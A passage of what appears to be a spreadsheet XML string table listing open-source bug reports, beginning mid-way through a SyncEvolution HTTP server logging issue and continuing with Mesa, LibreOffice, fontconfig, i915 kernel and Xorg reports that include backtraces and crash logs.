   string DEBUG
   string done with connection to 'syncevo-server-http.py (HTTP)' unexpectedly
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Connection/7414306401283853336 interface=org.syncevolution.Connection member=Abort
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Session/7414306401283853336 interface=org.syncevolution.Session member=StatusChanged
   string done
   uint32 10500
   array [
      dict entry(
         string addressbook
         struct {
            string none
            string idle
            uint32 0
         }
      )
      dict entry(
         string calendar
         struct {
            string none
            string idle
            uint32 0
         }
      )
      dict entry(
         string memo
         struct {
            string none
            string idle
            uint32 0
         }
      )
      dict entry(
         string todo
         struct {
            string none
            string idle
            uint32 0
         }
      )
   ]
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Server interface=org.syncevolution.Server member=SessionChanged
   object path /org/syncevolution/Session/7414306401283853336
   boolean false
method call sender=:1.51 -&gt; dest=:1.46 path=/org/syncevolution/Connection/7414306401283853336 interface=org.syncevolution.Connection member=Close
   boolean false
   string lost connection to SyncEvolution
error sender=:1.46 -&gt; dest=:1.51 error_name=org.freedesktop.DBus.Error.UnknownMethod reply_serial=17
   string Method Close with signature bs on interface org.syncevolution.Connection doesn't exist
It seems like the dbus server uses signals to return log lines but the http server does not seem to show them making them lost in the void. This makes setting up the HTTP server a bit of challenge :-)
---- Additional Comments From patrick.ohly@intel.com 2010-09-07 04:33:55 +0000 ----
(In reply to comment #0)
&gt; I've been trying to get the HTTP server running but I got the following output
&gt; after connecting with a client.
&gt; 
&gt; matthijs@login:~$ syncevo-http-server http://localhost:9000/sync
&gt; POST from 178.226.74.128 config  type application/vnd.syncml+wbxml session None
&gt; args {} length 1795
&gt; requesting new session
&gt; SessionChanged: /org/syncevolution/Session/7414306401283853336 1
&gt; connection /org/syncevolution/Connection/7414306401283853336 went down
&gt; ERROR:dbus.connection:Exception in handler for D-Bus signal:
[...]
&gt; DBusException: org.freedesktop.DBus.Error.UnknownMethod: Method Close with
&gt; signature bs on interface org.syncevolution.Connection doesn't exist
I suspect that the syncevo-http-server does not need to call Close here but it probably isn't smart enough to know that and always tries. If it wasn't necessary then the only negative effect is this error message here.
&gt; This seems like there is something wrong with the dbus interface specs or
&gt; something. However it turns out there is a really simple configuration
&gt; problem. Running dbus-monitor shows the real error (the first two signals are
&gt; relevant).
As you probably noticed the syncevo-http-server is not particularly user-friendly. It started its life as a debugging utility and later got packaged because users started to find it useful.
Right now the expectation is that the syncevo-dbus-server is started manually and that its output is used to diagnose issues. The HOWTO implicitly describes that in the part about setting up client configs in the server which depends on detecting the device ID of new clients (see also https://bugs.meego.com/show_bug.cgi?id=1360).
The LogOutput feature was added later. I agree syncevo-dbus-server should print these messages.
It also should avoid the unnecessary Close method and probably be less verbose.
Patches welcome as always :-/ Anything assigned to  syncevolution-bugs@meego.bugs is not currently being worked on.
---- Additional Comments From matthijs@stdin.nl 2010-09-07 04:38:43 +0000 ----
(In reply to comment #1)
&gt; The LogOutput feature was added later. I agree syncevo-dbus-server should
&gt; print these messages.
I assume you mean syncevo-http-server here?
---- Additional Comments From patrick.ohly@intel.com 2010-12-27 13:45:05 +0000 ----
I'm improving syncevo-http-server output. syncevo-http-server output for the case where a client connects which has no config yet:
[INFO] sync: ./syncevo-dbus-server: ready to run
[INFO] syncevo-http: new SyncML session for 127.0.0.1
[ERROR] sync: no configuration found for deviceID foobar
How was the no sources active check configuration error triggered? I'd like to ensure that it is logged properly and that the excessive close() call is avoided but my first naive approach (ask for unknown URI) did not lead to the error.
Instead I got in the client:
[INFO] vcard30: server database not found check URI 'foobar'
The server later times out which did trigger the excessive close() call (error for that now suppressed).
---- Additional Comments From matthijs@stdin.nl 2010-12-27 14:36:38 +0000 ----
I think I got that error by creating a new peer without specifying any sources to make active. In other words I had sync = disabled in ~/.config/syncevolution/default/peers//sources/*/config.ini
At least I think I did I haven't actually tried to trigger the error again. Let me know if this doesn't work then I'll try a little harder.
---- Additional Comments From patrick.ohly@intel.com 2010-12-28 00:31:25 +0000 ----
(In reply to comment #4)
&gt; I think I got that error by creating a new peer without specifying any sources
&gt; to make active. In other words I had sync = disabled in
&gt; ~/.config/syncevolution/default/peers//sources/*/config.ini
When I try that I get the same error in the client as for an invalid URI:
  [INFO] vcard30: server database not found check URI 'addressbook'
&gt; At least I think I did I haven't actually tried to trigger the error again.
&gt; Let me know if this doesn't work then I'll try a little harder.  
Perhaps the code has changed. Never mind I think we can consider this issue resolved. Some testing and confirmation once I am done with revamping the syncevo-http-server would be nice.
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 6369 at https://bugs.meego.com/show_bug.cgi?id=6369
</t>
  </si>
  <si>
    <t>SYSTEMD-55890</t>
  </si>
  <si>
    <t>man: typo fixes</t>
  </si>
  <si>
    <t>Created attachment 68459
Fix typos in various files
Another batch for typo fixes for the man pages.
Typos serial comma and removed either as there were more than two options. Also did an extra rename of system-shutdown to systemd-shutdown that was forgotten in this commit:
http://cgit.freedesktop.org/systemd/systemd/commit/?id=8bd3b8620c80d0f2383f2fb04315411fc8077ca1</t>
  </si>
  <si>
    <t>phomes</t>
  </si>
  <si>
    <t>FONTCONFIG-3160</t>
  </si>
  <si>
    <t>fc-cache segfaults in iconv under Solaris 2.8 processing Sun's TrueType dir</t>
  </si>
  <si>
    <t>I am trying to install fontconfig-2.3.1 under Solaris 2.8 and I keep
getting segfaults in fc-cache as it tries to scan /usr/X/lib//X11/fonts/TrueType
 ... I had the same problem with fontconfig-2.3.0.  I applied all the
iconv patches I could find to my Solaris system but I still have no solution
to this address alignment problem:
dbx fc-cache
(dbx) run -v /usr/X/lib//X11/fonts/TrueType
Running: fc-cache -v /usr/X/lib//X11/fonts/TrueType 
(process id 21979)
/space/fontconfig-2.3.1/fc-cache/.libs/fc-cache:
/usr/X/lib//X11/fonts/TrueType: signal BUS (invalid address alignment) in
iconv at 0xff140da4
0xff140da4: iconv+0x000c:       ld      [%i0] %o0
Current function is scanDirs
  179           if (!FcDirScan (set subdirs 0 FcConfigGetBlanks (config)
dir force))
(dbx) where                               
  [1] iconv(0xffffffff 0xffbef7f0 0xffbef7fc 0xffbef7f4 0xffbef7f8 0x1fc)
at 0xff140da4
  [2] 0xff346358(0xffbef8e4 0x0 0x7f 0x2fa 0x0 0x3d4) at 0xff346357
  [3] FcFreeTypeQuery(0x420 0xffffffff 0xffffffff 0x3cf10 0xff36dc7c 0x0)
at 0xff346d24
  [4] FcFileScanConfig(0x1 0x29e20 0x0 0x0 0xfadc0 0x0) at 0xff345d20
  [5] FcDirScanConfig(0x316b8 0x29e20 0x0 0x651600 0x2eb38 0x0) at 0xff346064
  [6] FcDirScan(0x316b8 0x29e20 0x0 0x651600 0x2eb38 0x0) at 0xff3460f0
=&gt;[7] scanDirs(list = 0x88c70 config = 0x29cf8 program = 0xffbefd08
/space/fontconfig-2.3.1/fc-cache/.libs/fc-cache force = 0 verbose = 1) line
179 in fc-cache.c
  [8] main(argc = 3 argv = 0xffbefc3c) line 291 in fc-cache.c
I am compiling using Sun's Forte 6.2 compilers.  I've used -xO2 optimization
and also no optimization and -g.  Further I just tried using GCC 3.2.1
compilers and I encounter the same segfault.  Any tips for me?  Oh I
also applied the patch in Bug #2774 without improvement.</t>
  </si>
  <si>
    <t>jpd</t>
  </si>
  <si>
    <t>MESA-106462</t>
  </si>
  <si>
    <t>piglit.spec.arb_vertex_array_bgra.get regression</t>
  </si>
  <si>
    <t xml:space="preserve">Standard Output
/tmp/build_root/m64/lib/piglit/bin/arb_vertex_array_bgra-get -auto
Standard Error
glGetIntegerv(GL_COLOR_ARRAY_SIZE) returned 225 GL_BGRA expected
glGetIntegerv(GL_SECONDARY_COLOR_ARRAY_SIZE) returned 225 GL_BGRA expected
Bisected to:
d07466fe18522cde1acadfc597583f80b69c15b7
Author:     Brian Paul 
mesa: fix glGetInteger/Float/etc queries for vertex arrays attribs
The vertex array Size and Stride attributes are now ubyte and short
respectively.  The glGet code needed to be updated to handle those
types but wasn't.
Fixes the new piglit test gl-1.5-get-array-attribs test.
v2: fix inadvertant whitespace change change COLOR_ARRAY_SIZE to UBYTE
misc fixes suggested by Justin
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=106450
Fixes: d5f42f96e16 (mesa: shrink size of gl_array_attributes (v2))
Cc: mesa-stable@lists.freedesktop.org
Reviewed-by: Mathias FrÃ¶hlich 
Reviewed-by: Jordan Justen </t>
  </si>
  <si>
    <t>FONTCONFIG-23004</t>
  </si>
  <si>
    <t>Use general forms in Arabic orthographies</t>
  </si>
  <si>
    <t>Currently Arabic orthographies (namely Arabic Persian and Urdu) relay on the presence of Arabic presentation forms. This leads to exclusion of many high quality Arabic OpenType fonts that don't include full set Arabic Presentation Forms B (it doesn't make much sense for OpenType fonts anyway). This affects fonts like SIL Scheherazade and Lateef IranNastaliq and many of the newly developed Arabic OpenType fonts. One of the side effects is that all these fonts aren't used by Qt to render Arabic script (see Qt bug http://www.qtsoftware.com/developer/task-tracker/index_html?id=127773&amp;method=entry).
Since there aren't any applications using presentation forms directly checking for its presence doesn't make much sense as what really matters is the OpenType layout features without it the font is useless even if it has presentation forms.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72078</t>
  </si>
  <si>
    <t>UI: Fault of text french version</t>
  </si>
  <si>
    <t>A fault of text in French version when we opening a file .xlsx : https://bv7nza.bn1.livefilestore.com/y2mYapB8Vf_PO6qMpEPmelORGk39i0Riy4YX1OI-qZPlKHNhokHE8GY0qS_h76ZVyp2NKBysMzXK4JQ5zoyCUSKps7atPyjtXCOVe5433Y2Ds9Xe9oGZxuWmYsGYMmUtJDv/Faute%20LO%20import%20classeur%20xlsx.png?psid=1
Loading... -&gt; Chargement du classeur... or Importation du classeur... or Import du classeur... or Chargement... or other as you like.
Operating System: All
Version: 4.1.3.2 release</t>
  </si>
  <si>
    <t>21Naown</t>
  </si>
  <si>
    <t>LIBREOFFICE-70278</t>
  </si>
  <si>
    <t>Time (Variable) field not (properly) imported from ODF</t>
  </si>
  <si>
    <t>DESCRIPTION
When creating Date Variable and contains a Time Variable field then Time Variable field is lost when the document is reopened.
STEP
1. Insert a Date Variable field.
2. Insert a Time Variable field in the same text area as the Date Variable Field.
3. Save the document.
4. Close the document.
5. Open the document
CURRENT BEHAVIOUR
The Time Variable field is lost.
EXPECTED BEHAVIOUR
The Time Variable field must be retained.
Operating System: Debian
Version: 4.1.2.3 rc</t>
  </si>
  <si>
    <t>hendre</t>
  </si>
  <si>
    <t>MESA-94412</t>
  </si>
  <si>
    <t>Trine 3 misrender</t>
  </si>
  <si>
    <t>Created attachment 122126
wrong render screenshot
Pink colors in bright areas instead of white.
(appears as soon as the main menu)</t>
  </si>
  <si>
    <t>CAIRO-4409</t>
  </si>
  <si>
    <t>Dashes are missing initial caps</t>
  </si>
  <si>
    <t>When dashing each dash is receiving a trailing cap but no initial cap as it
should.</t>
  </si>
  <si>
    <t>SPICE-29254</t>
  </si>
  <si>
    <t>win32 qxl xddm</t>
  </si>
  <si>
    <t>Windows media player and VLC crash on Windows Xp guest</t>
  </si>
  <si>
    <t>The above players crash when attempting to play movie on windows xp guest when the
Qxl is installed. 
When disabling the driver there is no such problem.
Also media player classic does not crash.</t>
  </si>
  <si>
    <t>WAYLAND-48988</t>
  </si>
  <si>
    <t>[task] ICCCM: clipboard manager interface?</t>
  </si>
  <si>
    <t>what's needed?  just notification that the selection has gone away.  should the clipboard manager be able to take over the selection seamlessly ie with the same timestamp etc?  Doesn't seem like we need that the clipboard will have to set a new data_source anyway with the subset of mimetypes it offers (the clipboad manager may only offer a subset of the types offered by the original data_source)</t>
  </si>
  <si>
    <t>MESA-55856</t>
  </si>
  <si>
    <t>kwin with gles  window content is not updating (gen4)</t>
  </si>
  <si>
    <t>Created attachment 68425
Xorg.log
Using kwin-4.9.2 KWin on OpenGL ES with mesa-9.0 window content is not updating (for example progressBar).
We must move window to see changes.
This error not occurs with 9.0_pre20120918 (gentoo package)
kernel-3.6.1
xorg-server-1.13.0
libdrm-2.4.39
xf86-video-intel-2.20.9
pixman-0.27.2
lspci-v
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (primary) (rev 0c) (prog-if 00 [VGA controller])
        Subsystem: Lenovo T61
        Flags: bus master fast devsel latency 0 IRQ 45
        Memory at f8100000 (64-bit non-prefetchable) [size=1M]
        Memory at e0000000 (64-bit prefetchable) [size=256M]
        I/O ports at 1800 [size=8]
        Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit-
        Capabilities: [d0] Power Management version 3
        Kernel driver in use: i915</t>
  </si>
  <si>
    <t>wojtask9</t>
  </si>
  <si>
    <t>DBUS-11497</t>
  </si>
  <si>
    <t>Error implementing  org.freedesktop.Notifications</t>
  </si>
  <si>
    <t>Writing a notification-daemon according to the Desktop Notification Specification from http://www.galago-project.org/specs/notification/index.php
 using dbus-java fails due to some conversion error
Steps to reproduce:
1. ensure you have a working installation of libnotify and notification-daemon (from http://www.galago-project.org/ )
2. kill any running notification-daemon
3. run NotifyD.main()  (see attachment)
4. run notify-send test
5. see that NotifyD.Notify is never called although it should
Enabling DEBUG reveals the following error message:
Failure in de-serializing message (java.lang.IllegalArgumentException: Not An Expected Convertion type from class [Ljava.lang.Object to interface java.util.Map)</t>
  </si>
  <si>
    <t>MESA-96410</t>
  </si>
  <si>
    <t>[Perf] Pre validate _mesa_sampler_uniforms_pipeline_are_valid like _mesa_sampler_uniforms_are_valid</t>
  </si>
  <si>
    <t>Hello
Profiling my app (PCSX2) it seems a fair amount of time is spend on the _mesa_sampler_uniforms_pipeline_are_valid. I only uses a single pipeline object so it always trigger revalidation of the pipeline which isn't ideal.
Anyway it feels that it ought to be possible to cache/prevalidate sampler of program like the _mesa_sampler_uniforms_are_valid function (which is the same function but for monolithic build). 
It would be nice to reduce the overhead of the function. Perf reports around 4% of nouveau_dri.so.
Thanks
Gregory</t>
  </si>
  <si>
    <t>DRI-104708</t>
  </si>
  <si>
    <t>[IGT] igt@gem_exec_flush@* BUG: unable to handle kernel paging request at 0000000100000084</t>
  </si>
  <si>
    <t>Created attachment 136859
dmesg ff cnl
We had an oops while running igt@gem_exec_nop@basic-series in CNL's FF cycle. After this the next test igt@gem_exec_parse@basic-allowed timed out probably derived from the Oops and igt@gem_exec_parse@basic-rejected was Incomplete probably derived from the two previous tests.
Stdout	
An internal exception that should have been handled was not:
Test run time exceeded timeout value (600 seconds)
[  293.788239] BUG: unable to handle kernel paging request at 0000000100000084
[  293.788281] IP: print_request+0x11/0xb0 [i915]
[  293.788288] Oops: 0000 [#1] SMP PTI
[  293.788291] Dumping ftrace buffer:
[  293.788294]    (ftrace buffer empty)
[  293.788295] Modules linked in: snd_hda_codec_hdmi asix usbnet mii ip6table_filter ip6_tables bnep iptable_filter 8250_dw binfmt_misc snd_soc_skl snd_soc_skl_ipc snd_soc_sst_ipc snd_soc_sst_dsp snd_hda_ext_core snd_soc_acpi nls_iso8859_1 snd_hda_codec_realtek snd_soc_core snd_hda_codec_generic snd_compress snd_pcm_dmaengine ac97_bus snd_hda_intel snd_hda_codec x86_pkg_temp_thermal snd_hda_core snd_hwdep intel_powerclamp coretemp snd_pcm kvm_intel kvm snd_seq_midi irqbypass snd_seq_midi_event snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel pcbc snd_seq aesni_intel aes_x86_64 crypto_simd snd_seq_device glue_helper cryptd snd_timer iwlwifi input_leds snd serio_raw wmi_bmof btusb btrtl btbcm btintel soundcore idma64 bluetooth shpchp virt_dma cfg80211 intel_pch_thermal intel_lpss_pci ecdh_generic
[  293.788343]  intel_lpss tpm_crb acpi_pad mac_hid parport_pc ppdev lp parport ip_tables x_tables autofs4 e1000e ptp i915 pps_core wmi video
[  293.788354] CPU: 3 PID: 36 Comm: kworker/3:1 Tainted: G     U           4.15.0-rc8-drm-intel-qa-ww3-commit-6a58f7b+ #1
[  293.788356] Hardware name: Intel Corporation CannonLake Client Platform/CannonLake Y LPDDR4 RVP BIOS CNLSFWR1.R00.X114.B04.1711300710 11/30/2017
[  293.788385] Workqueue: events_long i915_hangcheck_elapsed [i915]
[  293.788419] RIP: 0010:print_request+0x11/0xb0 [i915]
[  293.788421] RSP: 0018:ffffb15f80e33cc0 EFLAGS: 00010282
[  293.788424] RAX: 0000000000000017 RBX: ffffb15f80e33e28 RCX: 0000000000000006
[  293.788426] RDX: ffffb15f80e33d30 RSI: 00000000fffffffc RDI: ffffb15f80e33e28
[  293.788427] RBP: ffffb15f80e33e28 R08: 0000000000000003 R09: 0000000000000000
[  293.788429] R10: 0000000000000005 R11: ffffb15f80e33d41 R12: ffffb15f80e33d30
[  293.788431] R13: 00000000fffffffc R14: 0000000000000000 R15: ffff91411b0bc340
[  293.788433] FS:  0000000000000000(0000) GS:ffff914131180000(0000) knlGS:0000000000000000
[  293.788435] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  293.788437] CR2: 0000000100000084 CR3: 00000001c780a006 CR4: 0000000000760ee0
[  293.788439] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  293.788441] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  293.788442] PKRU: 55555554
[  293.788443] Call Trace:
[  293.788477]  intel_engine_dump+0x8fe/0xc30 [i915]
[  293.788500]  ? engine_stuck+0x1b9/0x240 [i915]
[  293.788524]  ? fwtable_read32+0x83/0x1b0 [i915]
[  293.788556]  i915_hangcheck_elapsed+0x347/0x370 [i915]
[  293.788561]  ? drm_printk+0xc0/0xc0
[  293.788565]  process_one_work+0x154/0x400
[  293.788568]  worker_thread+0x4a/0x440
[  293.788570]  kthread+0xf5/0x130
[  293.788572]  ? process_one_work+0x400/0x400
[  293.788574]  ? kthread_associate_blkcg+0x90/0x90
[  293.788578]  ret_from_fork+0x32/0x40
[  293.788580] Code: b9 01 00 00 00 be 90 40 00 00 89 c2 48 89 df 41 ff d4 e9 f6 fc ff ff 0f 1f 00 0f 1f 44 00 00 41 55 41 54 49 89 d4 55 53 48 89 fd  8b 86 88 00 00 00 48 8b 3d 61 93 29 cb 48 89 f3 48 2b be f0 
[  293.788633] RIP: print_request+0x11/0xb0 [i915] RSP: ffffb15f80e33cc0
[  293.788635] CR2: 0000000100000084
[  293.788637] ---[ end trace 33a847ebe65771c1 ]---</t>
  </si>
  <si>
    <t>elizabethx.de.la.torre.mena</t>
  </si>
  <si>
    <t>DRI-93987</t>
  </si>
  <si>
    <t>[SKL] Screens fail to go into standby</t>
  </si>
  <si>
    <t>loomsen</t>
  </si>
  <si>
    <t>MESA-59499</t>
  </si>
  <si>
    <t>SIGSEGV src/mesa/swrast/s_blit.c:546</t>
  </si>
  <si>
    <t>mesa: 56c01d81094795286828ecb83713e043695e905a (master)
Run piglit fbo-srgb-blit on swrast.
$ ./bin/fbo-srgb-blit -auto
Mesa warning: failed to remap index 167
Mesa warning: failed to remap index 207
Mesa warning: failed to remap index 208
Mesa warning: failed to remap index 211
Mesa warning: failed to remap index 377
Segmentation fault (core dumped)
(gdb) bt
#0  0x00007f9031b8738f in blit_linear (ctx=0xe0bed0 srcX0=7 srcY0=7 srcX1=9 srcY1=9 dstX0=0 dstY0=0 dstX1=8 dstY1=16) at ../../../src/mesa/swrast/s_blit.c:546
#1  0x00007f9031b87f20 in _swrast_BlitFramebuffer (ctx=0xe0bed0 srcX0=7 srcY0=7 srcX1=9 srcY1=9 dstX0=0 dstY0=0 dstX1=8 dstY1=16 mask=16384 filter=9729)
    at ../../../src/mesa/swrast/s_blit.c:812
#2  0x00007f9031a3123b in _mesa_BlitFramebuffer (srcX0=7 srcY0=7 srcX1=9 srcY1=9 dstX0=0 dstY0=0 dstX1=8 dstY1=16 mask=16384 filter=9729) at ../../../src/mesa/main/fbobject.c:3057
#3  0x0000000000401076 in blit_rect (src_format=35907 dst_format=32856 x=-1 y=0 w=1 h=1 stretch=true) at piglit/tests/fbo/fbo-srgb-blit.c:66
#4  0x00000000004012d6 in piglit_display () at piglit/tests/fbo/fbo-srgb-blit.c:114
#5  0x00007f9035517408 in display () at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:60
#6  0x00007f9034ed1137 in fghRedrawWindow (window=0xe07e60) at freeglut_main.c:210
#7  fghcbDisplayWindow (window=0xe07e60 enumerator=0x7fffab7497a0) at freeglut_main.c:227
#8  0x00007f9034ed4889 in fgEnumWindows (enumCallback=0x7f9034ed10d0  enumerator=0x7fffab7497a0) at freeglut_structure.c:394
#9  0x00007f9034ed15fa in fghDisplayAll () at freeglut_main.c:249
#10 glutMainLoopEvent () at freeglut_main.c:1450
#11 0x00007f9034ed1f05 in glutMainLoop () at freeglut_main.c:1498
#12 0x00007f90355175e0 in run_test (gl_fw=0x7f90357e17e0 argc=1 argv=0x7fffab749b68) at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:127
#13 0x00007f9035515726 in piglit_gl_test_run (argc=1 argv=0x7fffab749b68 config=0x7fffab749a50) at piglit/tests/util/piglit-framework-gl.c:127
#14 0x0000000000400e9e in main (argc=2 argv=0x7fffab749b68) at piglit/tests/fbo/fbo-srgb-blit.c:41
(gdb) frame 0
#0  0x00007f9031b8738f in blit_linear (ctx=0xe0bed0 srcX0=7 srcY0=7 srcX1=9 srcY1=9 dstX0=0 dstY0=0 dstX1=8 dstY1=16) at ../../../src/mesa/swrast/s_blit.c:546
546	   gl_format drawFormat = _mesa_get_srgb_format_linear(drawRb-&gt;Format)
(gdb) print drawRb
$1 = (struct gl_renderbuffer *) 0x0
bed997dabaada5e7c8081db08f93a6f1b5932e8b is the first bad commit
commit bed997dabaada5e7c8081db08f93a6f1b5932e8b
Author: Anuj Phogat 
Date:   Tue Dec 11 20:17:47 2012 -0800
    mesa: Add support to allow blitting to multiple color draw buffers
    This patch fixes a blitting case when drawAttachment-&gt;Texture ==
    readAttachment-&gt;Texture. It was causing an assertion failure in
    intel_miptree_attach_map() with gles3 conformance test case:
    framebuffer_blit_functionality_minifying_blit
    Number of changes in this file look scary. But most of them are caused
    by introducing a big for loop to support rendering to multiple color
    draw buffers.
    V2: Fixed a case when number of draw buffer attachments are zero.
    V3: Put a for loop in blit_nearest() and blit_linear() functions in to
        support blitting to multiple color draw buffers.
    V4: Remove variable declaration in for loop to avoid MSVC compilation
        issues.
    Signed-off-by: Anuj Phogat 
    Reviewed-by: Kenneth Graunke 
    Reviewed-by: Ian Romanick 
:040000 040000 98d5e6ea72f2fcf765cd8241682ab18c8081cc70 ee017ce78ded09098a4ded7a90e19130b53e4eea M	src
bisect run success</t>
  </si>
  <si>
    <t>MESA-92609</t>
  </si>
  <si>
    <t>[BDW BSW] piglit sampling-2d-array-as-2d-layer fails</t>
  </si>
  <si>
    <t xml:space="preserve">Piglit 91c537f8190e109fd0fb14d63fed997eff102669 introduced a new test which passes on all Intel hardware everywhere except BDW and BSW.
This failure pattern probably indicates a platform-specific bug.
output:
bin/arb_texture_view-sampling-2d-array-as-2d-layer -auto -fbo
Probe color at (00)
  Expected: 0.000000 1.000000 0.000000 1.000000
  Observed: 1.000000 0.000000 0.000000 1.000000
layer 1 failed
Probe color at (00)
  Expected: 0.000000 1.000000 0.000000 1.000000
  Observed: 1.000000 0.000000 0.000000 1.000000
layer 2 failed
</t>
  </si>
  <si>
    <t>LIBREOFFICE-32435</t>
  </si>
  <si>
    <t>MSI branding not locale sensitive</t>
  </si>
  <si>
    <t>As above while the initial NSIS wrapper is branded correctly for BrOffice in RC2 the internal MSI file continues to have LibreOffice artwork branding for pt-BR with string branding for BrOffice -)
More work is required to unwind quite how to brand an MSI file per locale.</t>
  </si>
  <si>
    <t>PKG-CONFIG-3530</t>
  </si>
  <si>
    <t>[PENDING] add a PKG_CHECK_EXISTS() autoconf macro</t>
  </si>
  <si>
    <t>The following patch adds a PKG_CHECK_EXISTS() macro.  A fair number of Gnome
packages do things like this:
  PKG_CHECK_MODULES(NOTUSED somepackage somepackage_exists=yes
somepackage_exists=no)
And don't use the resulting NOTUSED_CFLAGS / NOTUSED_LIBS environment variables.
The PKG_CHECK_EXISTS() macro only does the --exists check without setting
variables or exiting if there is no ACTION-IF-NOT-FOUND and the check fails.  It
also logs the check to config.log.  I also modified the _PKG_CONFIG() macro to
use PKG_CHECK_EXISTS().</t>
  </si>
  <si>
    <t>DRI-29894</t>
  </si>
  <si>
    <t>KMS regression in 2.6.35: Flicker and half-rendered scenes in SDL games with Radeon RV770</t>
  </si>
  <si>
    <t>I am getting severe flickering in multiple SDL-based games with Radeon HD 4870 (RV770)
Games tested that have this problem:
* World of Goo (SDL 32-bit)
* Frets on Fire (Python SDL true 3D 64-bit)
* Aquaria (SDL 32-bit)
----
* kernels 2.6.33.4 and 2.6.34.2 are good even with KMS enabled
* kernels 2.6.35.4 with KMS disabled is good
* kernels 2.6.35 and 2.6.35.4 with KMS enabled is bad
The problem manifests itself in substantial flickering most frames seem to render OK but a couple of times every second there's an incomplete frame. The incomplete frame looks like a half-rendered scene with some objects missing.
Using xorg-server 1.9.0 mesa 7.8.2 xf86-video-ati-6.13.1
(also tried mesa from git)
Normally I have 2 screens attached but this time I also tried disabling the second screen and unplugged it entirely.
lspci:
01:00.0 VGA compatible controller: ATI Technologies Inc RV770 [Radeon HD 4870]
glxinfo:
OpenGL renderer string: Mesa DRI R600 (RV770 9440) 20090101  TCL DRI2
OpenGL version string: 2.0 Mesa 7.8.2</t>
  </si>
  <si>
    <t>marti</t>
  </si>
  <si>
    <t>POPPLER-14294</t>
  </si>
  <si>
    <t>certain characters are rendered improperly</t>
  </si>
  <si>
    <t>Created attachment 14015
test pdf
I run Evince on Ubuntu Hardy which links against poppler 0.6.2. xpdf renders the attached pdf correctly while poppler does not.</t>
  </si>
  <si>
    <t>egon.kocjan</t>
  </si>
  <si>
    <t>LIBREOFFICE-46712</t>
  </si>
  <si>
    <t>EDITING: Crash when deleting a function using a data range</t>
  </si>
  <si>
    <t>Created attachment 57751
Spreadsheet with steps 1 to 5 already done
Hello 
Problem description: Crash when deleting a function using a data range
Steps to reproduce:
1. File&gt; New&gt; Spreadsheet (same problem with an existing one)
2. Select A1:A5
3. Data&gt; Define range give a name (MyData for instance)
4. Ok to close the dialog
5. in B1 enter the formula :
=ROWS(MyData)
6. Select B1 Edit&gt; Delete cell (or delete key)
Expected behavior: deletes B1
Current behavior: crash
Platform (if different from the browser): 
Reproduced (fr-discuss) with :
LibO 3.5.0 et 3.5.1 rc1 Linux Mint 12 &amp; Win7 64bit              
LibO 3.5.0 XP
LibO 3.5.0 Vista Sp2
Regards
PYS</t>
  </si>
  <si>
    <t>DRI-41917</t>
  </si>
  <si>
    <t>[IVB] all three screens are frozen while starting gnome-session with 3-pipe active</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:        IvyBridge
Kernel: (ivb-3-pipe)344f5205ecf58b0c56f7d6439621fa5467e9881e
Bug detailed description:
-------------------------
when we start the gnome-session with 3 displays active all screen are frozenonly wallpaper and cursor.system is alive.</t>
  </si>
  <si>
    <t>XORG-103243</t>
  </si>
  <si>
    <t>1.19.4  [REGRESSION] commit 388dc1aeac9acf2d51ad5103570beffd81d78b96 breaks PRIME synchronization</t>
  </si>
  <si>
    <t>Commit
https://cgit.freedesktop.org/xorg/xserver/commit/?h=server-1.19-branch&amp;id=388dc1aeac9acf2d51ad5103570beffd81d78b96
breaks PRIME sync i.e. Optimus hardware with nvidia binary driver PRIME output and Sync (nvidia-drm.modeset=1 kernel parameter) active.
Symptoms differ slightly depending on system.
e.g. running gdm/gnome after about 10 seconds the display gets frozen including mouse pointer and I can move around a second mouse pointer to move around but no screen updates occur any more. No error messages or warnings the xserver is running fine I can switch to text console and back or zap the xserver but no more screen updates.
Another user reported running lightdm it take 1 min to see a login but screen updates occur every 30sec.
https://devtalk.nvidia.com/default/topic/1025005/linux/-modeset-1-xserver-1-19-4-won-t-work/
Reverting this commit or deactivating PRIME Sync by setting nvidia-drm.modeset=0  returns the xserver to normal operation.</t>
  </si>
  <si>
    <t>hhfeuer</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-91063</t>
  </si>
  <si>
    <t>application/jrd+json</t>
  </si>
  <si>
    <t>Created attachment 116661
[PATCH 1/2] Add application/jrd+json as subclass of application/json
See https://www.iana.org/assignments/media-types/application/jrd+json</t>
  </si>
  <si>
    <t>LIBREOFFICE-41799</t>
  </si>
  <si>
    <t>Crash Saving Edited XLS with VBA Macro Code</t>
  </si>
  <si>
    <t>Created attachment 52347
crashes on save if edited
I have a file that if I just re-save it to a new XLS gives this warning but otherwise works OK:
All changes to the Basic Code are lost. The original VBA macro code is saved instead.
But if I for example clear all the data rows (not those that looks like headers) and save as a new XLS I get the error as above then if I close LibreOffice I get a document recover window with no documents listed.
Attached is the first file.</t>
  </si>
  <si>
    <t>DRI-111062</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@gem_create@create-clear - dmesg-fail - Failed assertion: __gem_read(fd handle offset buf length) == 0</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_320/fi-skl-guc/igt@gem_create@create-clear.html
Starting subtest: create-clear
(gem_create:1388) ioctl_wrappers-CRITICAL: Test assertion failure function gem_read file ../lib/ioctl_wrappers.c:388:
(gem_create:1388) ioctl_wrappers-CRITICAL: Failed assertion: __gem_read(fd handle offset buf length) == 0
(gem_create:1388) ioctl_wrappers-CRITICAL: Last errno: 12 Cannot allocate memory
(gem_create:1388) ioctl_wrappers-CRITICAL: error: -12 != 0
Subtest create-clear failed.
**** DEBUG ****
